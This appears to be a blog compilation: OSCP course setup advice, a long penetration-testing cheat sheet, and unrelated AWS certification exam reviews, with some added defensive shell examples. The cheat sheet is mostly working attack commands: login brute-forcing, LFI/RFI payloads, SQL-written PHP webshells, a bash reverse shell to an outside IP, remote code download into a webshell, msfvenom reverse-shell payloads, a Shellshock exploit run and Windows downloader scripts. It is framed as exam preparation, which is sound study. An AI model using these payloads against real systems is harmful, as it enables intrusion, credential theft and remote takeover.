Once the Offensive Security Course Starts…

If you have just signed up for an Offensive Security course (PWK for OSCP or AWAE for OSWE), there are a couple of things you need to be aware of.

Back up the Course Materials

Once the course starts, you will receive an email from Offensive Security with the course materials. This is extremely time-sensitive: you only have 3 days to download the course materials.

There will be two separate links, one for the PDF and one for the videos. Download the course materials as soon as you can and make sure you keep a backup. Offensive Security does not retain copies, and if you somehow could not download the course materials in time or lost them, they will ask you to pay for them.

Set up Kali with the VPN connection

In the same email, you will find the connectivity pack, lab-connection.tar.bz2. Download your preferred Kali image and set up the VPN connection in Kali.

  1. Download Kali: https://www.kali.org/downloads
  2. Create a new virtual machine with VMware Workstation Player (free).
  3. Use the downloaded Kali .iso image to create the new Kali VM.
  4. Once the Kali VM is created, log in to Kali and install VMware Tools.
     Guide reference: https://linuxconfig.org/how-to-install-vmware-tools-on-kali-linux
  5. Then simply drag the “lab-connection.tar.bz2” file into the VM and extract it.

  • tar xvf lab-connection.tar.bz2
  • openvpn OS-XXXX-XXX.ovpn
  • Type the username and password (the credentials are in the Offensive Security email)

You can also create a text file containing the username and password and update the .ovpn file to automate the login process.

  • Create a pass.txt file with the username on the first line and the password on the second line, and point the .ovpn file at it.
  • Now you can connect to the VPN without typing the username and password.
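As an added example (not from the original post), the following POSIX shell functions perform that automation while keeping the credential file private: they write pass.txt with owner-only permissions, add the auth-user-pass directive OpenVPN reads it from, and check the result before connecting. The profile name OS-XXXX-XXX.ovpn and the credential values below are placeholders.

```shell
#!/bin/sh
# Added example, not from the original post: automate the OpenVPN login from the
# steps above without leaving the lab credentials world-readable.
# Assumptions (not from the page): the profile is OS-XXXX-XXX.ovpn from the
# Offensive Security email, and pass.txt holds the username on line 1 and the
# password on line 2, which is the format OpenVPN's auth-user-pass expects.

# write_auth_file FILE USER PASS
# Creates the two-line credential file. The subshell umask makes the file
# 0600 from the moment it exists, so the plaintext password is never exposed.
write_auth_file() {
    file="$1"; user="$2"; pass="$3"
    (umask 077; printf '%s\n%s\n' "$user" "$pass" > "$file")
    chmod 600 "$file"
}

# add_auth_directive OVPN FILE
# Appends "auth-user-pass FILE" to the profile unless it is already there, so
# "openvpn OVPN" stops prompting for the username and password.
add_auth_directive() {
    ovpn="$1"; authfile="$2"
    if grep -q '^auth-user-pass' "$ovpn"; then
        return 0        # already automated; do not add a duplicate directive
    fi
    printf 'auth-user-pass %s\n' "$authfile" >> "$ovpn"
}

# check_auth_setup OVPN FILE
# Returns 0 only when the directive points at FILE, FILE has exactly two lines,
# and FILE is readable by its owner alone (GNU stat). OpenVPN itself only warns
# about a group/world-readable credential file, so this is stricter on purpose.
check_auth_setup() {
    ovpn="$1"; authfile="$2"
    grep -q "^auth-user-pass $authfile\$" "$ovpn" || return 1
    [ "$(wc -l < "$authfile" | tr -d ' ')" -eq 2 ] || return 1
    case "$(stat -c '%a' "$authfile")" in
        600|400) return 0 ;;
        *)       return 1 ;;
    esac
}

# Typical use on the Kali VM (credentials come from the Offensive Security email):
#   write_auth_file pass.txt 'OS-XXXXX' 'your-lab-password'
#   add_auth_directive OS-XXXX-XXX.ovpn pass.txt
#   check_auth_setup OS-XXXX-XXX.ovpn pass.txt && openvpn OS-XXXX-XXX.ovpn
```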

    Introduction to the OSCP Certification

    OSCP (Offensive Security Certified Professional) is a hacking certification offered by Offensive Security. *Offensive Security is a US-based international information security company that provides the ExploitDB vulnerability database and Kali Linux.

    Unlike other information security certifications, it is a 100% hands-on exam in which you have to hack within 24 hours, and because you must complete the hacking within the given time and submit a report, it is more expensive than typical information security certifications and has a lower pass rate. Still, in the US, simply obtaining this certification basically guarantees a base salary of 100k to 120k (100 to 120 million KRW); it is one of the most highly recognized certifications.

    OSCP Certification

    • Issuing organization : Offensive Security
    • Certification exam : 100% practical
      • Exam time : 24 hours + 24 hours (report writing) = 48 hours total
      • Exam content : Obtain the highest administrator privileges on the given virtual machines within 24 hours, then submit a penetration test report within the following 24 hours.
      • Preparation period : 6 to 9 months (varies by individual)
    • Official site : https://www.offensive-security.com/

    Scanning – Web

    Web Login Form Brute-forcing

    HTTP Hydra

    hydra -l admin -P /usr/share/wordlist/SecList/Passwords/10k_most_common.txt 192.168.88.162 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64
    
    

    PUT method

    nmap -sV --script http-put --script-args http-put.url='/test/meterpreter4444.php',http-put.file='/root/Exam0119/pwd/192.168.111.149/meterpreter4444.php' -p 80 192.168.111.149
    nmap --script http-methods --script-args http-methods.url-path='/uploads',http-methods.test-all -p 8585 172.28.128.3
    
    

    Starting Web Service

    //Attacker usually uses this to transfer files
    python -m SimpleHTTPServer 8080
    python3 -m http.server 80
    
    

    Nmap Scanning for Web Service(HTTP/HTTPS)

    nmap -PN -p 22 --open -oG - 10.11.1.* | awk '$NF~/ssh/{print $2}'
    nmap 10.11.1.* -p22,80 --open -oG - | awk '/22\/open.*80\/open/{print $2}'
    nmap 10.11.1.* -p80,8080 --open -oG - | awk '/80\/open.*8080\/open/{print $2}'
    nmap -p 80,8080 10.11.1.1-255
    
    

    – Uniscan Scanning

    uniscan.pl -u target -qweds
    
    

    – HTTP Enumeration 

    httprint -h http://www.example.com -s signatures.txt
    
    

    – Directory Brute-forcing 

    To discover subdirectories and files.
    DirBuster wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

    dirb http://10.11.1.202 /usr/share/dirb/wordlists/vulns/iis.txt
    gobuster -u http://10.11.1.133/ -w /usr/share/wordlists/dirb/common.txt -q -n -e
    dirb http://10.11.1.133/index/sips/ /usr/share/dirb/wordlists/
    ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $targetip -e php
    //cf. https://github.com/maurosoria/dirsearch
    
    //only report responses with status 200,204,301,307,403 (-s = positive status codes)
    gobuster -s 200,204,301,307,403 -u http://192.168.88.168 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
    
    

    – Nikto 

    nikto -h 192.168.88.132
    nikto -h http(s)://[IP]:[PORT]/[DIRECTORY] 
    nikto -C all -h http://10.11.1.72
    
    

    LFI(Local File Inclusion)

    lfisuite.py
    eg.

    browse.php?file=php://filter/convert.base64-encode/resource=ini.php
    browse.php?file=php://filter/convert.base64-encode/resource=browse.php
    echo -n encodedstrings | base64 -d
    browse.php?file=/etc/passwd
    index.php?file=
    
    

    If the target has phpinfo.php, check the “file_uploads” setting; if it appears as enabled (On), the target is vulnerable to LFI.

    Uploading a malicious .php file via the database 

    ref : http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html
    SQL PHP shell script : create the malicious shell.php below from the DB

    Windows : SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"
    Linux : SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"
    
    

    After uploading the malicious PHP webshell above, browse to the page with a command, e.g. http://192.168.1.101/DBlocation/shell.php?cmd=ipconfig

    RFI(Remote File Inclusion) 

    eg.

    browse.php?file=http://10.11.0.42/index.html
    browse.php?file=ftp://10.11.0.42/index.html
    browse.php?file=expect://ls
    
    

    Gain a shell via phpinfo.php, ref: https://office.tuxcon.com/root/web-sec-payloads/src/commit/fd99da6c06e00a596becdcfc6d2efe50bad0f47c/File Inclusion – Path Traversal

    Squid 

    msf auxiliary : scanner/http/squid_pivot_scanning
    RHOST : Target
    RANGE : Target
    RPORT : Squid port

    msf auxiliary(scanner/http/squid_pivot_scanning) > run
    [+] [192.168.88.155] 192.168.88.155 is alive but 21 is CLOSED
    [+] [192.168.88.155] 192.168.88.155:80 seems OPEN

    If the target runs a Squid proxy on port 3128, run nikto through that proxy:
    nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128
    
    

    ShellShock 

    If the nikto scan results show Shellshock on /cgi-bin, use 34900.py:

    root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234
    [!] Started reverse shell handler
    [-] Trying exploit on : /cgi-bin/status
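From the defender's side, the same probe is easy to spot in web server logs. The following shell functions are an added example, not code from the original post or from the 34900.py script; they scan constructed Apache combined-format log lines for the "() {" prefix that a Shellshock request carries in a header field, and list the source addresses.

```shell
#!/bin/sh
# Added example (not from the original post): detect Shellshock probes like the
# one the 34900.py run above sends, from the defender's side, by scanning web
# server access logs for the "() {" function-export prefix that triggers the
# bash bug. The log lines below are constructed for this example.

# Constructed sample of Apache "combined" log lines (referer and user agent are
# the last two quoted fields; both are common carriers for the probe).
SAMPLE_LOG='10.0.0.5 - - [10/Jan/2020:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jan/2020:10:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :; }; echo; /bin/id"
10.0.0.9 - - [10/Jan/2020:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 3000 "() { ignored; }; /bin/true" "curl/7.64"
10.0.0.7 - - [10/Jan/2020:10:00:04 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "python-requests/2.22"'

# shellshock_hits LOGFILE
# Prints every line whose Referer or User-Agent field carries the "() {" prefix.
# Whitespace between "()" and "{" is optional in the vulnerable parser, so the
# pattern allows it; plain POSIX grep -E, so it runs on any Linux/BSD box.
shellshock_hits() {
    grep -E '\(\)[[:space:]]*[{]' "$1"
}

# shellshock_sources LOGFILE
# Lists the distinct client IPs that sent a probe, one per line, for blocking
# or for correlating with which /cgi-bin paths they touched.
shellshock_sources() {
    shellshock_hits "$1" | awk '{print $1}' | sort -u
}

# shellshock_count LOGFILE
# Prints the number of probe lines (0 when the log is clean).
shellshock_count() {
    shellshock_hits "$1" | wc -l | tr -d ' '
}

# Write the constructed sample to a temp file and report on it.
demo() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_LOG" > "$tmp"
    echo "probe lines: $(shellshock_count "$tmp")"
    echo "sources:"
    shellshock_sources "$tmp"
    rm -f "$tmp"
}

demo
```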
    
    

    MySQL 

    nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306
    
    

    MySQL login : mysql -h 192.168.88.152 -D wordpress -u root -pplbkac
    MySQL spawning a reverse shell (Linux) : union select "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1'\"); ?>" INTO OUTFILE '/var/www/ecustomers/samshell4.php'

    UPLOAD A FILE :

    ' union select "<?php file_put_contents(\"root\", file_get_contents(\"http://attack.samsclass.info/root\")); ?>" INTO OUTFILE '/var/www/ecustomers/samget2.php' #
    
    

    OPEN A PHP SHELL :

    ' union select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/ecustomers/samshell.php' #
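The INTO OUTFILE trick in the MySQL examples above, and under "Uploading a malicious .php file via the database", only works when mysqld is allowed to write into the web root; MySQL's secure_file_priv setting governs that. The following shell functions are an added example, not from the original post: they read a my.cnf, report the effective secure_file_priv policy, and show a constructed weak configuration beside a hardened one.

```shell
#!/bin/sh
# Added example (not from the original post): the INTO OUTFILE web-shell trick
# above only works when mysqld may write to the web root. MySQL's
# secure_file_priv variable controls that, so this checks a my.cnf from the
# defender's side. The config snippets are constructed for this example.

# Constructed weak config: no secure_file_priv, so SELECT ... INTO OUTFILE may
# write anywhere the mysqld user can, including /var/www/html.
WEAK_CNF='[client]
port=3306
[mysqld]
datadir=/var/lib/mysql
bind-address=0.0.0.0'

# Constructed hardened config: NULL disables LOAD DATA / INTO OUTFILE entirely
# (a dedicated directory outside the web root is the next-best setting).
HARDENED_CNF='[mysqld]
datadir=/var/lib/mysql
secure-file-priv=NULL
bind-address=127.0.0.1'

# secure_file_priv_value CNFFILE
# Prints the [mysqld] value of secure_file_priv (dash or underscore spelling,
# trailing comments stripped), or "UNSET" when the section does not define it.
secure_file_priv_value() {
    awk '
        /^[[:space:]]*\[/ { in_mysqld = ($0 ~ /^[[:space:]]*\[mysqld\][[:space:]]*$/); next }
        in_mysqld && $0 ~ /^[[:space:]]*secure[-_]file[-_]priv[[:space:]]*=/ {
            sub(/^[^=]*=[[:space:]]*/, "")
            sub(/[[:space:]]*(#.*)?$/, "")
            print; found = 1; exit
        }
        END { if (!found) print "UNSET" }
    ' "$1"
}

# file_priv_verdict CNFFILE
# Prints DISABLED (NULL), RESTRICTED:<dir> (exports confined to one directory)
# or UNRESTRICTED (unset or empty: the web-root write above would succeed).
file_priv_verdict() {
    v=$(secure_file_priv_value "$1")
    case "$v" in
        NULL|null) echo "DISABLED" ;;
        UNSET|"")  echo "UNRESTRICTED" ;;
        *)         echo "RESTRICTED:$v" ;;
    esac
}

# Write both constructed configs to temp files and compare their verdicts.
demo() {
    w=$(mktemp); h=$(mktemp)
    printf '%s\n' "$WEAK_CNF" > "$w"
    printf '%s\n' "$HARDENED_CNF" > "$h"
    echo "weak my.cnf     : $(file_priv_verdict "$w")"
    echo "hardened my.cnf : $(file_priv_verdict "$h")"
    rm -f "$w" "$h"
}

demo
```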
    
    

    Windows IIS 

    Get the Windows OS and version details through Nikto / Nmap scanning.

    auxiliary/admin/http/iis_auth_bypass

    Tomcat 

    The default credentials for Tomcat are “tomcat/tomcat”; check the /manager console by browsing to e.g. http://10.11.1.209:8080/manager/html
    You can upload a reverse shell through the manager console as an msfvenom JSP or WAR file:

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.37 LPORT=443 -f war > shell.war
    jar -xvf shell.war
    
    

    Config files 

    PHP and DB credential files

    /etc/mysql/my.cnf 
    /var/www/html/config.php
    
    

    WordPress 

    wpscan --url http://10.11.1.71/ --enumerate p
    wpscan --url 10.0.2.4 --enumerate vp
    wpscan --url https://192.168.88.152:12380/blogblog --enumerate u --disable-tls-checks
    wpscan --url http://192.168.88.179/wordpress/ --wordlist /usr/share/wordlists/rockyou.txt
    wpscan --url https://192.168.88.152:12380/blogblog/ --enumerate ap --disable-tls-checks
    wpscan --url www.local.test --enumerate u --threads 50
    
    

    ref : finding username & password(autoscript) : https://github.com/claudioviviani/bash-wordpress-xml-bruteforce

    phpMyAdmin 

    http://.../phpmyadmin
    The DB name and password are in /etc/phpmyadmin/config-db.php; default credentials can be root/(blank) or pma/(blank).
    You can also brute-force it with hydra:
    hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"

    Webdav

    WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229
    auxiliary : webdav_test

    cadaver http://10.11.x.x/webdav/
    

    Uploading shells.txt, then copying it to shells.asp;.txt:

    dav:> put shells.txt
    dav:> copy shells.txt shells.asp;.txt
    

    ColdFusion (Vulnerable)

    Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
    LFI (password file) : http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.propertiesen
    (either neo-security.xml or password.properties)
    ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

    exploit/windows/http/coldfusion_fckeditor (only for 8.0.1)

    XAMPP

    XAMPP default credentials (wampp/xampp)

    RealVNC

    RealVNC : https://www.exploit-db.com/exploits/36932
    Edit BIND_ADDR to your own IP and BIND_PORT to 4444.
    root@kali:~/PWK-Lab/10.11.1.227$ python RealVNC-exploit-36932.py
    [*] Please input an IP address to pwn: 10.11.1.227
    [*] Hello From Server: RFB 003.008
    Ctrl+Alt+Shift+Del sends Ctrl+Alt+Del inside the VMware VM.

    SquirrelMail

    https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh

    AT-TFTP

    Version 1.9, ref: https://github.com/brianwrf/cve-2006-6184

    perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
    msfvenom -p windows/shell/reverse_nonx_tcp LHOST=10.11.0.37 LPORT=443 R > payload
    cat stackadj payload > shellcode
    cat shellcode | msfvenom -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f python
    
    

    MISC

    Drupal default credentials (admin/admin)
    Elastix default credentials (admin/admin), e.g. http://example.com/vtigercrm/
    You might be able to upload a shell as the profile photo.

    Post-Exploit: Transferring Files

    File Transfer

    The methods below can be used to transfer files.

    Transferring Files to Windows

    Running Webserver on Kali

    python -m SimpleHTTPServer 8080 
    
    

    Transfer with Netcat

    //Kali
    nc -lvp 1234 > zeroday.txt
    //Win 
    nc 192.168.0.114 1234 < zeroday.txt
    
    

    ref: https://blog.ropnop.com/transferring-files-from-kali-to-windows/

    TFTP 
    If the target has a tftp client, you can easily check by typing tftp in the Windows cmd prompt.
    Starting the tftp service on Kali :

    atftpd --daemon --port 69 /tftp 
    /etc/init.d/atftpd restart
    cd /srv/tftp
    cp /var/www/html/nc.exe .
    
    
    //transfer nc.exe  
    tftp -i 10.11.0.42 GET nc.exe
    //PUT
    tftp -i 10.11.0.42 PUT test.txt
    
    

    FTP 
    Set up an FTP service by installing the pyftpdlib library

    apt-get install python-pyftpdlib  
    python -m pyftpdlib -p 21 -w
    
    

    Transfer with FTP commands

    You can also automate the ftp process by creating ftp.txt

    echo open 10.11.0.42>ftp.txt
    echo anonymous>>ftp.txt
    echo password>>ftp.txt
    echo binary>>ftp.txt
    echo get nc.exe>>ftp.txt 
    echo bye>>ftp.txt
    ftp -s:ftp.txt
    
    

    cf. Setting up a pure-ftpd FTP server (setup-ftp script)

    groupadd ftpgroup 
    useradd -g ftpgroup -d /dev/null -s /etc ftpuser
    pure-pw useradd offsec -u ftpuser -d /ftphome 
    pure-pw mkdb 
    cd /etc/pure-ftpd/auth/ 
    ln -s ../conf/PureDB 60pdb 
    mkdir -p /ftphome 
    chown -R ftpuser:ftpgroup /ftphome/ 
    /etc/init.d/pure-ftpd restart
    
    
    root@kali:~# chmod 755 setup-ftp 
    root@kali:~# ./setup-ftp 
    Password: 
    Enter it again: 
    Restarting ftp server
    
    

    Creating a VBScript downloader 
    wget.vbs * VBScript (e.g. on Windows XP, 2003)

    //wget.vbs
    
    echo strUrl = WScript.Arguments.Item(0) > wget.vbs
    echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
    echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
    echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
    echo Err.Clear >> wget.vbs
    echo Set http = Nothing >> wget.vbs
    echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
    echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
    echo http.Open "GET",strURL,False >> wget.vbs
    echo http.Send >> wget.vbs
    echo varByteArray = http.ResponseBody >> wget.vbs
    echo Set http = Nothing >> wget.vbs
    echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
    echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
    echo strData = "" >> wget.vbs
    echo strBuffer = "" >> wget.vbs
    echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
    echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
    echo Next >> wget.vbs
    echo ts.Close >> wget.vbs
    

    Usage : cscript wget.vbs http://10.11.0.42/wget.exe wget.exe

    PowerShell (Windows 7, 2008 and above)
    wget.ps1

    echo $storageDir = $pwd > wget.ps1 
    echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
    echo $url = "http://10.11.0.42/nc.exe" >>wget.ps1 
    echo $file = "nc.exe" >>wget.ps1 
    echo $webclient.DownloadFile($url,$file) >>wget.ps1 
    

    Usage : powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

    Basic Scanning

    Default Nmap Scanning

    nmap -sU -sV -n --top-ports 200 192.168.1.30  > /root/PWK-Lab/192.168.1.30/nmap-udp
    nmap -sT -sV -A -O -v -p 1-65535 192.168.1.30 > /root/PWK-Lab/192.168.1.30/nmap-tcp
    

    -sS stealth scanning

    nmap -vv -Pn -A -sC -sS -T 4 -p- 10.x.x.x
    nmap -p- -sS -A 10.x.x.x
    
    • Vulnerability scanning : nmap -sS -sV --script=vulscan/vulscan.nse 10.x.x.x
    • OS detection : nmap -O -v 10.x.x.x

    Automated scanning tools

    • Reconnoitre : python /root/Recon/Reconnoitre/reconnoitre.py -t 10.x.x.x -o /root/PWK-Lab/10.x.x.x/ --services
    • OneTwoPunch : vi targets.txt; onetwopunch.sh -t targets.txt -p all -n "-sV -O --version-intensity=9"
    • unicornscan -i tap0 -I -mT 10.x.x.x:a
    • masscan -p0-65535 10.x.x.x --rate 150000 -oL output.txt

    Scanning per protocols

    – SSH(22)

    • Bruteforce :
    nmap -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=users.txt,ssh-brute.timeout=4s 10.x.x.x 
    hydra -l user -P /usr/share/wordlists/rockyou.txt  10.x.x.x ssh -t 4
    

    ref : https://github.com/g0tmi1k/debian-ssh && https://blog.g0tmi1k.com/2010/04/pwnos/
    OpenF*** (Apache mod_ssl < 2.8.7 OpenSSL) 764.c

    – FTP(21)

    • Default credentials : anonymous/anonymous | ftp/ftp | ftpuser/ftpuser
    nmap -sV -Pn -vv -p 21  --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 10.x.x.x
    nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.x.x.x
    check windows OS files : https://www.quora.com/How-can-I-tell-what-version-of-Windows-is-installed-on-a-hard-drive-without-booting-it 
    
    • Bruteforce :
    medusa -h 10.x.x.x -u user -P /root/SecLists/Passwords/bt4-password.txt -M ftp 
    /root/PWK-Lab/FTP/ftp-user-enum-1.0/ftp-user-enum.pl -U /root/PWK-Lab/fuzzdb/bruteforce/names/simple-users.txt -t 10.x.x.x
    

    – SMTP(25)

    • Vulnerability Check
    nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.x.x.x 
    
    • Enumerating Users
    nmap --script smtp-enum-users.nse 10.x.x.x
    
    smtp-user-enum -M VRFY -U users.txt -t 10.x.x.x
    smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.x.x.x
    smtp-user-enum -M VRFY -U  /usr/share/seclists/Usernames/Names/names.txt -t 10.x.x.x
    
    • Connecting to Mail Server
    telnet IPADDRESS 25
    nc -nvv IPADDRESS 25
    
    • msf module : auxiliary/scanner/smtp/smtp_enum

    – POP3(110)

    • Bruteforce : hydra -L usr.txt -P /usr/share/wordlists/fasttrack.txt -t20 10.x.x.x -s55007 -I pop3
    • POP3 command
    USER boris
    PASS *****
    LIST 
    RETR 1 
    

    – SNMP(161)

    • Default Community Strings : public/private/manager
    snmp-check -t [IP] -c public 
    snmpwalk -c public -v1 10.0.0.0 
    nmap -sU --open -p 161 10.11.1.0/24 -oG mega-snmp.txt 
    sudo nmap -sU -p 161 --script default,snmp-sysdescr 10.11.1.0/24 
    onesixtyone -c community -i ips 
    
    nmap 10.11.1.* -p161 --open -oG - | awk '/161\/open/{print $2}' 
    

    – SMB(139,445)

    • Checking SMB port open/running :
    nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.txt; grep Up smb_service.txt | cut -d " " -f 2  
    nmap 10.11.1.* -p139,445 --open -oG - | awk '/139\/open.*445\/open/{print $2}'  
    
    • Vulnerability scanning 

     nmap -p 139,135,445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.x.x.x

    • Enumerating Users  

    nmap --script smb-enum-users.nse -p445 10.x.x.x
    nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 10.x.x.x

    • smbclient
    smbclient -L //10.x.x.x/share -U user 
    smbclient //10.x.x.x//IPC$ -N  
    
    • checking access
    acccheck -v -t 10.x.x.x  -u user -P /usr/share/dirb/wordlists/common.txt  
    acccheck -v -t 10.x.x.x -U /root/Vulnhub/Stapler/user.txt  -P /usr/share/dirb/wordlists/common.txt  
    
    • smbmap
    smbmap -u user -p user -d share -H 10.x.x.x  
    smbmap -u user -p .bash_history -d share -H 10.x.x.x  
    smbmap -H 10.x.x.x\share -u user -p '.bash_history' -L  
    

    ref : https://hackercool.com/2016/07/smb-enumeration-with-kali-linux-enum4linuxacccheck-smbmap/

    OSCP Study Method: Buffer Overflow

    To pass the OSCP, you need a good understanding of buffer overflows (BoF). Offensive Security already provides a lot of BoF-related material, but the lab and course exercises provided in PWK are not enough to prepare for the exam.

    So, specifically to prepare for the exam, I studied by applying usable BoF vulnerabilities from Exploit-DB. On exploit-db (https://www.exploit-db.com/) you can see a wide variety of vulnerabilities and the code that exploits them.

    I searched for Buffer Overflow, filtered on whether the vulnerable application was available, and when it was, built a similar environment in a VM and practiced writing the code. (For example, for the SLmail v5.5 buffer overflow vulnerability, I downloaded the vulnerable program from exploit-db, set it up on a Windows VM, and then wrote the BoF myself on the attacking Kali machine and attacked it.)

    Many programs for buffer overflow practice have already been posted on other sites as well; I used the vulnerable programs below.

    AWS Certified Security Specialty Study Guide

    Overall, it took me about 3 months of studying for this exam alongside a full-time 40 hrs/week job. I’m pretty sure anyone who has more hands-on experience in an AWS environment will take less than 3 months to pass this exam.


    Study Material;

     

    Study Plan;

    I spent the first two months listening to the ACloudGuru course and making my own notes, then watched LinuxAcademy. The ACloudGuru course does cover all of the exam topics, though you still need to fill in more details based on the AWS FAQs or whitepapers. I really like the structure of A Cloud Guru‘s course, having a summary video and practice quiz for each chapter, where students can refresh their memory and go for further research & study based on the quiz’s feedback. The Linux Academy course has a really useful feature, labs, where you can go into their temporary AWS console and practice. If you prefer to learn hands-on, I would recommend LinuxAcademy.

     

    *TIPS* Since we are busy workers or have other things to do in real life, it’s pretty tough to find extra time for studying. So I printed out the courses’ summaries/notes in a small pocket size and read them during my commute or at lunch time at work. You can find summary & exam notes on GitHub or Quizlet: Brianlam38’s GitHub and Antoine_Sylvia’s Quizlet. I also uploaded the mind map I created during the ACloudGuru course to my GitHub.


    After finishing the online courses in 2 months, I started practicing with an exam simulator. I took the ACloudGuru Exam Simulator and got 60 at first… and I realized that I had never studied this topic in a scenario-based way before. *Unlike the AWS Practitioner exam, the Security Specialty exam has a lot of scenario-based questions and you get to choose either the more reasonable or the more secure answer (depending on the question, the answer can be the cost-effective choice). So I practiced with ACloudGuru & BrainCert and learned the AWS security services through real-life examples, because I ended up reading a bunch of AWS whitepapers and AWS Security Blog articles based on the feedback I got from each test.

    By the time I got a score of 95 on the ACloudGuru Exam Simulator, I decided to book the exam. I also took the AWS Certified Security Specialty practice exam online, but this one doesn’t show how much you scored nor which questions were incorrect.. So you can buy the practice exam (it was free for me since I had a voucher code from a previous AWS cert exam) if you want to see the level of difficulty of the exam.


    If you prefer to read additional study material & study plan, I find below blogs&sites are useful;

     

    AWS Certified Security Specialty Exam Review – 2020

    The AWS Certified Security – Specialty gives you a broad understanding of security principles and the architecture of the AWS environment, as well as a deep dive into the security tools and services that AWS provides.

    The exam format is multiple choice, multiple answer; 170 minutes (the practice test is $40) and it costs 300 USD. *TIPS* When you register for your exam or practice exam, you can get 50% OFF the exam fee and a FREE practice exam if you have vouchers to use from a previous AWS cert test. Luckily, I had vouchers to use for both after passing the practitioner test.

    For more details about the exam, please check the AWS official website and the AWS Certified Security Specialty Exam Guide.

    I took the exam on Feb 17th, 2020 at 10:00 AM; it took me literally the entire 160 minutes to finish. I had 10 minutes before time out, and had 5 more survey questions after the exam question review :o..  The exam was tougher than I thought. I’m glad that I passed. I will update more on the study plan & materials I used in the next post.

    AWS Certified Practitioner Exam Review-2019

    AWS Certified Cloud Practitioner: passing the exam within one month.

    I started studying for the AWS Certified Cloud Practitioner on Aug 31st. I finished all 6 chapters from A Cloud Guru during weekends. I believe the course itself is 6 hours total.

    During the video lectures, I wrote down a few key notes & summaries, since I tend to get easily distracted with online courses. After memorizing the key notes and summary notes, I finished the practice test on CloudGuru with a score of 86. And I spent one or two weeks reading the suggested whitepapers from the AWS exam guide. I only read the 3 white papers below, just once each.

    • Overview of Amazon Web Services whitepaper, July 2019
    • Architecting for the Cloud: AWS Best Practices whitepaper, October 2018
    • How AWS Pricing Works whitepaper, June 2018

    After that, I purchased the AWS Certified Cloud Practitioner practice test on Udemy. I personally feel the level of difficulty is as follows, so I want to point out that the actual exam questions can be more difficult than the CloudGuru practice test.

    There’s also a (free) course from the AWS training website for AWS Cloud Practitioner, but personally I find CloudGuru more informative and user-friendly. So I skipped the AWS training course and just completed the AWS Cloud Practitioner practice test (free).

    [ AWS Cloud Guru Practice Test < Exam < Udemy Practice Test ].

